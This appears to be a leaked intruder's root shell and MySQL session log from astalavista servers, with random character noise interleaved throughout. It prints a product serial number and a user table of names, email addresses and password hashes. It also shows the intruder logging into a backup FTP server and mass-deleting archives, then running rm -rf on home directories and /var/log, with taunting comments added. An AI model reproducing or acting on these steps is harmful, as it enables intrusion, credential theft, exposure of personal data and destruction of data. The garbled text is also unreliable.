drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot * q) r: N1 I) idrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev : K5 o Y) e R( }2 }drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc $ J7 K2 a# V8 e$ o2 f, |- ^drwxr-xr-x 14 root root 4096 Mar 11 17:56 home: f2 y( V& E! P" e
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf2 D7 @9 b" G3 y3 q$ u1 C
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib & B+ q) [% T* I4 N9 ~$ p6 W5 odrwxr-xr-x 7 root root 4096 Jun 4 04:03 lib644 c$ P5 z9 w: C" p+ I. _
drwx—— 2 root root 16384 Sep 11 2007 lost+found 6 r* _# M5 u zdrwxr-xr-x 2 root root 4096 Mar 11 17:56 media7 ~3 l" `/ p# v4 m3 d7 J# ]; B
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc . c. c s+ g% S( F @" pdrwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt ' q; w, \" J# K( Z, x4 r-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg J9 l* R+ t* j
drwxr-xr-x 2 root root 0 Jun 3 02:43 net 3 A$ U, m6 D& g. e5 M- `drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt2 ?$ N/ j! G. e5 t0 L& D
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc % u6 ~8 G! d* H: ?drwxr-x— 15 root root 4096 Jun 4 08:40 root7 u% G8 [0 `, _, [3 a+ y
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin : J( z. u, Q+ `5 p4 e& hdrwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux, U6 T% {2 @0 w) \% O0 x+ F" h
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv% ^+ J9 b0 M6 \6 f* s, ~
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys 7 I' v* k9 H0 F- J: v$ cdrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp 8 B0 u: ~, T6 Jdrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr4 B% s( g; b1 b8 | Q0 c$ A6 q8 C8 L
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var% C0 Z; z# a2 M5 n$ A- |$ J, D
# e7 u, ?' w9 K7 U8 V+ l) Vsh-3.2# cd opt! J1 I& y5 i9 X- h" S
sh-3.2# ls -la & ?/ [# H( `' W: jtotal 20! W! d* R" }1 s' i# v5 Z' W
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .7 r S2 i4 B. ]6 `0 F% \
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ../ Q& J& z- J2 @. s; e2 Z
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws% q ?7 r7 s7 P5 `6 x3 I- _
7 X" M+ R7 `, A- z* ]9 L- i# ssh-3.2# cd lsws/1 U! j4 F+ s" h
sh-3.2# ls -la 8 ~" v! _3 y2 F3 T @0 ]. wtotal 108 & d% e( [/ N8 v) a }: O' m/ `( S' a$ mdrwxr-xr-x 15 root root 4096 Mar 20 2008 . ; I- X h7 r$ S9 m6 m4 sdrwxr-xr-x 3 root root 4096 Mar 11 17:56 .. : X( s9 q1 g edrwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons* i' E; n2 L. ?: Y' F. a" g+ k
drwxr-xr-x 13 root root 4096 May 29 15:10 admin # K- T/ ?5 }& }: Bdrwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate, p& O( [- z9 d
drwxr-xr-x 2 root root 4096 May 29 15:10 bin 4 p& {+ L/ ^/ a F. G: j2 [drwx—— 4 apache apache 4096 Jun 3 02:43 conf ) K& A8 M/ _+ Qdrwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT# F1 S3 |) ~1 N( D- Z# n2 U9 g
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs3 D9 \' y( w) {% K9 M
drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin ! L K' i9 E, Q0 m( F+ j, k2 ^2 ]7 hdrwxr-xr-x 2 root root 4096 Sep 15 2008 lib ; E/ ] H; j8 x! n$ D* j$ F7 u-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE }0 a8 j% X0 I. M7 L-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP, _8 v9 {5 R3 ^5 {+ |
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL 0 t. M0 F0 g1 e-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP! A9 _& w( [7 D3 [; m! b( I& ?
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs8 E B+ f+ h6 n, j# b3 I! y
drwxr-xr-x 2 root root 4096 Mar 20 2008 php' I+ }) h& F# o; C- [- l
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild7 e/ }0 n* N! u3 f
drwxr-xr-x 3 root root 4096 Mar 20 2008 share: E# i8 f: t* U
-rw-r–r– 1 root root 6 May 29 15:10 VERSION * w1 ~, Q$ L8 ^9 T A( [" Z: ^% [* Q( ]& Q% x
sh-3.2# cd conf 5 _9 n) R% _' j7 n# ssh-3.2# ls -la - t7 h6 |" R; vtotal 48- d, F1 U" C0 ^7 x; q, e5 w& i
drwx—— 4 apache apache 4096 Jun 3 02:43 ./ m9 W& }8 y) v1 A7 I% N6 U+ j
drwxr-xr-x 15 root root 4096 Mar 20 2008 .. " t& x4 ^8 H2 I* Sdrwx—— 2 apache apache 4096 Mar 20 2008 cert- P) a" K8 m$ i( K- j ~
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml 0 Q. N. i. _/ y' P P! ?5 i-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak+ R) F( O$ I' Y8 K. K2 o
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last7 x, \& K7 W. X$ z6 T. L+ N0 z% u6 r
-rw——- 1 apache apache 256 May 29 15:10 license.key " n r2 S6 U6 ?' r( i9 k-rw——- 1 apache apache 256 Mar 21 2008 license.key.old$ u1 z2 e& `) X
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties " b. G0 N2 c; d# A/ j& U-rw——- 1 apache apache 20 May 29 15:10 serial.no : p7 B1 U. Q7 A2 {3 Adrwx—— 2 apache apache 4096 Mar 20 2008 templates $ J9 J6 K( f- J% H 7 @0 ?4 V- _& U" @4 @( t9 F2 dsh-3.2# cat serial.no ( W" i7 _8 X" I& S- jIbDl-oVsO-CKqL-wVRa % v6 r/ K$ Y6 a3 O7 Q6 q4 S 8 f" A- J" f" Q6 Q+ bsh-3.2# mysql 6 J( D4 V: i/ a! o! q% FWelcome to the MySQL monitor. Commands end with ; or \g.$ o6 k; p5 _5 K a' _
Your MySQL connection id is 286844. e/ s# {4 N6 s# d1 D! ^# [
Server version: 5.0.45-community-log MySQL Community Edition (GPL)8 R$ A# K; G0 K1 u& b
4 ~0 R+ X* |0 NType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.( {3 \' p0 _6 K
3 j" ?; B% A; M4 Vmysql> show databases;7 ]& e4 G6 i' O- Q
+———————–+$ g( }7 }7 D8 u. r, F
| Database |5 H# C2 f3 M* M" n- W! Y9 H
+———————–+ / x, ?. V5 W# p; b0 || information_schema | 5 }" c; O9 m8 B# X+ F1 C| astanet_ads |& `4 l# H! [' @& R
| astanet_mailing_lists |* D, k& K( B. y2 K
| astanet_mediawiki | 4 V0 H- v; r g0 k; H4 o. G9 }1 q, R| astanet_membersystem |" X$ _- G r! v$ i- Q
| com_contrexx |+ z( N0 f4 K0 ?2 }
| com_contrexx2 | ; b4 e- J6 T) a6 ?1 {7 H# p g| com_contrexx2_live | $ B* q! z3 y, }| da_roundcube | $ c, ~) h% X4 Z) P| dolphin |, T( { Q5 [% D4 Y6 e9 d
| ideapool | . Q8 F+ ~0 ?; I& f/ i+ T0 v| mysql |0 \. ?0 p6 n! g4 W# g2 e
| test |; U# ?% x& ^6 [0 ~, Q
| yourmaster |" [$ @; i, @8 ?2 h, i
+———————–+6 ?# x8 f; E2 y7 |
14 rows in set (0.00 sec) ; w4 A$ o4 k8 _. p ) ~/ l( E% r5 o s3 Lmysql> use ideapool ' ?$ T3 C" D3 @/ hDatabase changed1 L4 d1 b4 R- G8 r4 X% W6 Z$ ^
mysql> show tables; 3 w7 S3 R \# @* c+———————————–+ 1 n( k1 L, L) @ D: {) D; S ?| Tables_in_ideapool | ) l2 E% B4 m" B, e+———————————–+; c, Z( r7 g8 _2 y7 E
| eventum_columns_to_display |$ g/ J0 j% t0 Z" f7 H! @+ I& ]
| eventum_custom_field |2 v, X! U- u$ d, ~! p7 j1 U+ ]
| eventum_custom_field_option | 1 T% N" u! \* X/ N/ u8 D) Q3 p| eventum_custom_filter | 5 G9 R5 s* X1 F4 r: ?$ P4 b& X) W| eventum_customer_account_manager |6 t# z9 F8 f6 F- V0 F2 O' u. t# p- U
| eventum_customer_note | " g! g) v1 } || eventum_email_account | ( o! [$ w8 x" d! y# _, d- \| eventum_email_draft | - c& X1 E: P7 y# C! Y| eventum_email_draft_recipient | T$ n- j0 [) {/ _+ L* u| eventum_email_response |& [9 q5 t, a N0 o. Z
| eventum_faq | y6 X: Z! c& L/ c' h& c9 g/ E| eventum_faq_support_level | : M5 a- H+ j5 X( m& {6 z# x) N| eventum_group |5 J6 ^2 b, T ]% o( |
| eventum_history_type |3 n L4 W1 P' m) ?6 [7 B
| eventum_irc_notice |, `. [7 T% f. e# D% @+ E6 p
| eventum_issue |, i E- o* ]5 ^1 f
| eventum_issue_association |8 f. K$ t' _. P1 z% k, M ?" E9 M
| eventum_issue_attachment | ) ~2 z9 ^9 N( h" E* ~( a| eventum_issue_attachment_file |$ i' A2 q8 w0 }1 O6 ?3 a
| eventum_issue_checkin |9 _8 w% i0 [6 X' r2 H4 w
| eventum_issue_custom_field | 8 _) X7 T4 ~2 g. E| eventum_issue_history | & ?1 l4 r% m4 C" y| eventum_issue_quarantine | k3 }, M' I H9 r2 j, q
| eventum_issue_requirement | ' D, T2 H6 a# F& D( a$ O| eventum_issue_user | 0 m4 L7 C7 F" l| eventum_issue_user_replier | 4 |# n( J7 f) {7 T" @. d u| eventum_link_filter |/ e4 W% b7 l; Y: p) |' d
| eventum_mail_queue |1 J' O+ T" g- r+ q
| eventum_mail_queue_log |: x/ t2 \/ T0 v( l
| eventum_news | 4 A# t& ]2 Q L| eventum_note |* F- m8 k/ Z' ~& o( |
| eventum_phone_support |, z0 Z" d2 T5 ^7 P! B
| eventum_project |- x. I# b2 T- c: w( x
| eventum_project_category | - R- d6 I7 `7 s7 S! X% F| eventum_project_custom_field |' Q% `) U( e; G u6 n0 r" \6 Y! x
| eventum_project_email_response |2 Y( J3 f/ |0 |% g: j! @; Y
| eventum_project_field_display |7 } ~" I, Y; H% s* E; C; i& G2 |
| eventum_project_group |& @3 z( D) ~& g
| eventum_project_link_filter | . l$ ] E8 }) L; O8 g7 o% z( s| eventum_project_news | - r; w( p# @* z5 i2 S| eventum_project_phone_category |( C) {" v& I! z
| eventum_project_priority | 7 i; |3 c3 g$ r3 s: w0 [, g| eventum_project_release | 1 l+ w' V4 e9 \; H. O& Y# Z| eventum_project_round_robin |' X) U1 v' d" Y- k$ d) T$ S# I
| eventum_project_status |2 c7 [3 |# I2 ~0 V8 y3 C$ a
| eventum_project_status_date | ! [* A2 F+ I$ }" T| eventum_project_user | + `8 f# I- u( d1 H; m| eventum_reminder_action | 6 I) c! c, {7 `2 ~9 p% a| eventum_reminder_action_list | 8 e. l5 T& V: R6 z3 `: {3 N7 Y| eventum_reminder_action_type | ; J' ~1 O# J) W4 j| eventum_reminder_field |6 C2 A) l' D# u u: J* s
| eventum_reminder_history |1 i, _- P7 D( K! e' N
| eventum_reminder_level |* I0 _4 J8 M- Y
| eventum_reminder_level_condition | ! ~ ?% u8 Z9 v0 U9 I$ a- p7 u| eventum_reminder_operator |8 a% I0 I6 ^9 s/ a6 R0 s
| eventum_reminder_priority | 8 r% w) x! |9 [1 S) E4 K, W& c; M| eventum_reminder_requirement |0 z9 Z3 y2 g2 }0 a: T3 ^3 b4 F
| eventum_reminder_triggered_action |1 }. L1 D' u7 ~; i# c
| eventum_resolution | T; b, j9 _3 P s
| eventum_round_robin_user |( J8 C: b b. D
| eventum_search_profile | 5 o5 _9 g) g5 u Q! N6 E: c| eventum_status |) `) m7 L' W" L0 F) [! S1 k; k1 {: m
| eventum_subscription | # Y0 ~& A! `6 C| eventum_subscription_type |4 V2 y _) j# R' f5 |
| eventum_support_email |$ E! J) L) J, x1 u
| eventum_support_email_body |- M2 L# b8 w" n k+ ?& L
| eventum_time_tracking | " v4 Y7 P& c, {7 w3 l- }+ K| eventum_time_tracking_category | 8 _' E0 m, Z# \* N* T% z| eventum_user | , |/ s1 f a+ Z5 O P2 Q7 W+———————————–+ 2 X7 ~3 C1 D A) ?3 [69 rows in set (0.00 sec) 1 J# N- _8 N( | 5 v* R: N) E8 ~ Y8 K1 zmysql> describe eventum_user; ^& \5 x* `/ o- T+————————-+——————+——+—–+———————+—————-+/ ]$ x/ m. S% V( W
| Field | Type | Null | Key | Default | Extra | $ F* {: N$ S% n+ E3 x& R5 _& _: o+————————-+——————+——+—–+———————+—————-+9 ]) E# u0 F; R6 _0 @
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment | - Y! L" i- t+ v3 ?| usr_grp_id | int(11) unsigned | YES | MUL | NULL | | 6 u V9 j* S3 W5 n| usr_customer_id | int(11) unsigned | YES | | NULL | |+ k& v f1 o: q) M' W% N
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | | $ F: p z0 p+ q3 [1 z" [. P/ p| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | | 3 b @$ Y: w% H8 g2 x: B! o, G| usr_status | varchar(8) | NO | | active | |0 j8 A0 Q- x6 B6 o. r5 b
| usr_password | varchar(32) | NO | | | | ; K; W8 T6 ]. g0 i# }0 c| usr_full_name | varchar(255) | NO | | | | # n1 r. ~; \8 v. Z& Y' J| usr_email | varchar(255) | NO | UNI | | |5 Q9 i) I p1 s5 R B* h
| usr_preferences | longtext | YES | | NULL | |% n- |. y) y4 m1 u+ r
| usr_sms_email | varchar(255) | YES | | NULL | | 7 e- f2 o# s4 P0 D| usr_clocked_in | tinyint(1) | YES | | 0 | | * k C; u) i3 \- c4 n" ^5 N; u) {| usr_lang | varchar(5) | YES | | NULL | | 0 R/ r( K. r3 C$ l& b+————————-+——————+——+—–+———————+—————-+% r- }+ d! g( m, h
13 rows in set (0.00 sec) $ V' L a4 g- B* q" R3 `- Q n+ F7 p$ @
mysql> select usr_full_name,usr_email,usr_password from eventum_user; ( I! i8 F8 ?1 {4 r( O+———————-+——————————-+———————————-+! k- D4 W6 w# e& u8 T2 U; Y
| usr_full_name | usr_email | usr_password | 7 [ c7 u$ W$ |. T5 V1 D. r+———————-+——————————-+———————————-++ c, O; a/ H% A2 [
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 | 6 C; E5 z: e9 h3 c& q+ d( k| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb | # J7 ]* t+ l# \, x) R| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |, R) U' g2 ^. P: I+ N
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |/ H' m/ [1 N6 J4 \; ~
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 | * E5 e ^$ ]% ^4 t$ T* U2 {/ g| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |# ? W( a+ i2 J5 S! r
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 | 0 h7 R) P9 u/ R2 K# r| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd | ! m5 B/ g& _ n2 {: ?| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e | H, l. U$ r+ \. R# }. O# U| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |( ^. \, I% V6 ` A4 Z5 T
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 | 8 V1 e; {- {' e& a| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |9 N( Z2 J* \; F- n
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |9 s% F1 _7 S5 z* }* ?
| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |) A0 T, ^ ?2 _5 ?0 l
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |0 ^- g- f& F* A( Z, h3 M' N
+———————-+——————————-+———————————-+ X: [( F' s) Z( r \. d15 rows in set (0.00 sec) $ A( @# [0 G( m8 |$ c' l7 \# c1 Q/ R3 w! I
mysql> select iss_description from eventum_issue where iss_id = 43; : E/ g/ w$ e9 H# I+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+4 C7 A+ p4 m* D) t, L Z
| iss_description ; V6 }/ J+ ] D# _
| # E- m7 U$ f( h; j$ Q4 S+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+ / F( y% \) S1 }0 H% J' F. j+ @| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be! f! j! F$ }) c
connected for 90 mins… 120mins… so what i propose is something like:& ~8 E5 M9 ?: ]# G: H 链接标记[url]http://www.surfthechannel.com/[/url] 5 z+ o" p, Y* }3 x- Jsince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system' c5 s X& C, u! l3 K' _
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t" e' U# y1 O6 i1 }# B! @
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off 5 A4 ]$ v# ?! G6 q- {( k% Rif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA… ! K& g! n8 Q! {7 W9 f+ P/ @7 E/ H0 n0 w! q
We could also put advertisement during play on the flash video player itself… extra $$… # n" m. k& t- G : A; @/ [( \/ C* LBy sykadul | # V1 ]3 \& a# w- ` \+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+ % k4 n4 z5 ~; \1 row in set (0.00 sec) 4 Z2 Y+ L: u# A0 H 7 w" M( d6 c8 t4 I% y8 s0 ~// Money and extra $$ is all they care about. remember that.) a1 `% W. P7 A8 ?* \8 g0 Q8 G
2 ^* q; w$ n$ h+ L
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;4 p& ~* ~: z% |
+————————+——————————————————————————————————————————————————————————————————————————————-+ 4 ~% r/ s# ]! ~. P1 }' H3 [| iss_summary | iss_description ( [# k1 a4 S0 ~4 d/ C
|- C% X- @7 y% G+ _- L
+————————+——————————————————————————————————————————————————————————————————————————————-++ n$ C: [1 ^8 }" K8 j: D
| Forum for REAL EXPERTS | Hello,- W1 H6 o" a# Y1 N' d/ i, r
5 S9 _3 E, P+ }& F& z# R; cIshtus and I, # A+ `7 i4 o5 Q8 A/ w; y* K7 r d* {
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide& q# Z$ P0 g1 } J4 s: Y; H
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc.. , x! C4 X3 k* N8 Q* p% Q" u4 o* S, M7 n6 R; i# u
One example a friend of mine from coresecurity.com!2 | v- F( j J& ?$ c
2 P. t6 R5 {) E5 ]- _! r/ D& z; [ m
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..' z( p% k9 n1 B# Q* P ~6 G
0 ]0 C% g* U: ?& U2 M|- J2 P2 V# N1 T3 Q& K) q
+————————+——————————————————————————————————————————————————————————————————————————————+ " k3 [% G- A; D: U1 row in set (0.00 sec) p) O# T% S) S
- m; X; |& ]% C8 p2 \
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…0 ~# m* J3 Q/ [4 H* O
3 T( O5 }: i( E" U9 k- y8 Mmysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;7 m E9 y! c( d6 F0 P
+——————+———————————————————————————————+ ! n: x+ t* M3 o. D5 u* I. r| iss_summary | iss_description | 7 U9 r9 s$ U' |6 ~/ }, ?+——————+———————————————————————————————+3 c- v5 b6 g: \2 E
| Website guidance | Virtual Girl which guides you trought the website.5 V" f* B5 T) q, u( p q
2 \6 ~$ L8 P- M
We need a girl with who you can ( talk )!!! : R- U: J9 x' z# m9 lAlso for the News!9 b' ~! T2 j4 \7 H5 Z( Q
So my suggestion is a girl who read you the news loud if you like! 6 m" a" y& I# `' tyou can choose between read yourselfe or she read it for you or both! W6 M: Q7 i% s( z0 c$ p1 s9 z$ W2 L* a
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!! # x1 L* w) a8 n A( \7 R o$ e2 W0 Y0 n* v4 E+ _- \- j8 g
Have a look on the example girls!! - u$ u2 G% z1 n. n/ {! w" e- d$ J3 |$ p 链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]' [! a( p8 B# X, F' H2 e6 j
5 w8 i9 |& Q. wor that+ I, ?; D3 |! G f# H5 J
+ Z" N `" c1 D, A; E+ V 链接标记[url]http://www.yellostrom.de/[/url] ) z# d( p4 U8 }. b) L' C' [7 g9 T8 V: f- a$ X2 t; ~
|! O6 o7 n- w# \% C$ J( b
+——————+———————————————————————————————+/ O$ z9 V# l) J+ ]4 x
1 row in set (0.00 sec) 9 M/ ^7 O% @ n7 n% z ( u4 |: p p* ^4 C* x$ H% H/ H: C// ha ha. 4 l8 v) T, Q" H" Y5 @) a$ j+ j$ J: n+ q7 A) F& T
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;* ^0 ^+ a+ I0 W
+————————–+———————————————————————————————————–+ 5 E" ^+ {9 B$ E| iss_summary | iss_description | ; _3 d9 ~ `+ v% O8 N+————————–+———————————————————————————————————–+ J1 A5 ?8 _! }- }
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. | * b4 p% |" [" [- k# e# A# n4 d3 y+————————–+———————————————————————————————————–+3 _& i: @( h% d5 [3 L% ]6 B
1 row in set (0.00 sec)! o) N4 ]$ Q1 ^- g* d3 _8 m
9 N5 A) n; r- ~: i2 \& N
// LOL." h+ X! L- ]* Q$ o, q8 y& @
N: V0 ~8 h2 A4 m3 V Z' z1 jmysql> exit 9 R4 t, I6 e7 N7 ~Bye! e8 d5 {6 c$ }. g
0 \" R }. j4 D
sh-3.2# ftp 212.254.194.163 8 ~* m. q8 j9 w: CConnected to 212.254.194.163./ z. O# [) K6 y" R1 h
220 BackupCOM_VW FTP server ready. 7 G& n1 p Z" y0 A- G4 b; ~* H0 X504 AUTH: security mechanism ‘GSSAPI’ not supported. & e) S; P+ ~4 q1 f5 u4 }3 `504 AUTH: security mechanism ‘KERBEROS_V4′ not supported. / U; b7 { Y5 I3 p( uKERBEROS_V4 rejected as an authentication type 5 v! O. V; w8 W8 l' {, K& {& PName (212.254.194.163:root): astalavista.com. h, ~' |& T" n+ z' u) U# T; s
331 Password required for astalavista.com.7 v! L* A/ Y S; ~" h$ V# U
Password: " l \2 N) e: I& U0 j230 User astalavista.com logged in.' S. c1 z6 P1 s4 ?% x2 Y' G5 d
Remote system type is UNIX. , P: Q) {# `/ J% b3 z- F, {Using binary mode to transfer files." P8 L7 M% G* g& U& Q
ftp> ls -la ) B5 F6 X* f( H0 c! |9 Y227 Entering Passive Mode (212,254,194,163,2,188) / ~ ~0 N$ K. s' c150 Opening BINARY mode data connection for ‘file list’. R Y) J/ P5 T, o
dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com' D0 R4 Y! K0 o: b) k$ Z
226 Transfer complete.4 |- B4 z/ ?7 u7 ~4 b n
ftp> cd astalavista.com 7 ]* U" ]8 s0 l; Q250 CWD command successful. ' y8 v8 I# [2 N6 u( c7 l& \ftp> ls -la6 T( Y) @0 h8 N9 |: A& [
227 Entering Passive Mode (212,254,194,163,2,189) L$ ^/ b* {- R' Q
150 Opening BINARY mode data connection for ‘file list’. 5 e* d9 b! {3 f# z-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar 9 z! \5 S2 t( D6 M$ t-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2- c! C7 ^ g% F
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2 * t5 T" P( ?4 w3 Q. c' @-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar 9 D& }: [( F/ l% j! P# Y7 b-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar # ~! l( r9 [% \: J: N9 ?; p/ q[snip]; |% @0 o' P4 m- g* h, d
226 Transfer complete.9 `' r1 M( m% B/ m
ftp> mdelete * 9 _9 k- T7 z5 ?% g* Dftp> ls -la - @7 s4 z5 ~0 i# y) e# W/ o, N4 k227 Entering Passive Mode (212,254,194,163,2,193)0 Y6 K* Z9 M; c5 M* M
150 Opening BINARY mode data connection for ‘file list’.6 k9 w& t. h- j3 [
226 Transfer complete. & |4 m' m# A& L9 R \0 x* ]ftp>4 c; K) C* t8 t
& \* ?1 p5 d; D% Vsh-3.2# cd /home % ~: H. v% m; u, ^! c5 Z3 ?sh-3.2# ls -la - E+ h4 j" K: dtotal 120 + R$ o" n+ L! W9 e' J1 Tdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .# ~$ C+ `4 e8 i: l. o7 M
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..: \' Q1 Q. K0 K7 [2 w) c% k5 ]+ R
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin , B5 W0 e. @6 Y% ]6 e9 l9 @! E( K-rw——- 1 root root 8192 Jun 4 03:03 aquota.group; |4 b I9 ^8 ]& U
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user 8 M y+ g# |. ?& q1 `, V, y% ldrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet * r& n, P5 R. G7 V& sdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup 7 A m2 e! L- H3 q$ Tdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161 % R/ t% w; _. H* s9 a+ Odrwx–x–x 10 com com 4096 Apr 28 12:40 com 9 U: Q8 _- i; d* I" }8 m+ g. B% A7 @7 cdrwxr-xr-x 2 root root 4096 May 17 2007 ftp P+ w9 g3 Y) L/ q& ~
drwx—— 3 jon jon 4096 Sep 21 2007 jon K6 W8 I6 E( l. C0 p8 D% [# S" W Ydrwx—— 2 root root 16384 Sep 11 2007 lost+found : q( o5 q1 k. B1 o& adrwxr-xr-x 2 root root 4096 Sep 14 2007 my. @- a1 D7 N& G0 N! Y- `
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata 8 ]7 W: t: L% S+ Z6 }drwx—— 2 jon jon 4096 Sep 15 2007 test* c2 Q8 n, Y! E! U1 W6 O# E
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp 7 x1 \! X8 \2 g- e - V4 W9 M% t4 A# _8 zsh-3.2# rm -rf backup/ $ C) o+ ~$ H3 }# w) c1 osh-3.2# rm -rf backup.14161/7 ^, y$ p; b8 m& X2 s
sh-3.2# rm -rf ftp/% j8 }) U+ Q2 e8 m
sh-3.2# rm -rf jon/8 X7 h* ]) P9 j1 r
sh-3.2# rm -rf my/ . D2 w: J2 |* q) k4 H$ a' l$ |sh-3.2# rm -rf mysqldata/ # h& ?% a+ m8 _/ w! T$ {* S( Nsh-3.2# rm -rf test/ $ j% X1 x5 d: A4 J5 M. `" Psh-3.2# rm -rf tmp/ M9 K( e9 C1 `% L9 `+ D
sh-3.2# cd ~ : `" c9 Y6 A! t- q) I+ A" U# vsh-3.2# rm -rf * : q( H3 A" ]$ v3 O" rsh-3.2# rm -rf /var/log/7 S/ Y6 n: \: o# G8 r# N
rm: cannot remove directory `/var/log//proftpd’: Directory not empty 5 M) H! n1 t* g( }; }# ]sh-3.2# rm -rf /home/*8 p: L1 |. v% [- z7 v
sh-3.2# mysql# t% x3 v/ f1 B) j: l- O, K
Welcome to the MySQL monitor. Commands end with ; or \g. $ L% B" T' F, F7 r# A5 ^! P/ uYour MySQL connection id is 407156 2 y7 s2 s, }: H1 X2 xServer version: 5.0.45-community-log MySQL Community Edition (GPL)% A5 Y! a8 b0 ^9 k) ?" n
9 N* x9 P/ U/ l2 p5 {Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.2 J4 T! C u/ A7 i9 [6 N4 ]
$ w6 B1 j( t- x! {; n; B
mysql> show databases;1 q! T9 l7 ]- t5 @8 I- c
+———————–+ ) ?, Q2 B/ } y7 K/ W% d| Database |# U1 U7 I: j3 q& S* B* b0 p
+———————–+ ) t, M' \6 |$ x8 p: }% }8 K| information_schema |* \0 p. n3 o" X. p% n
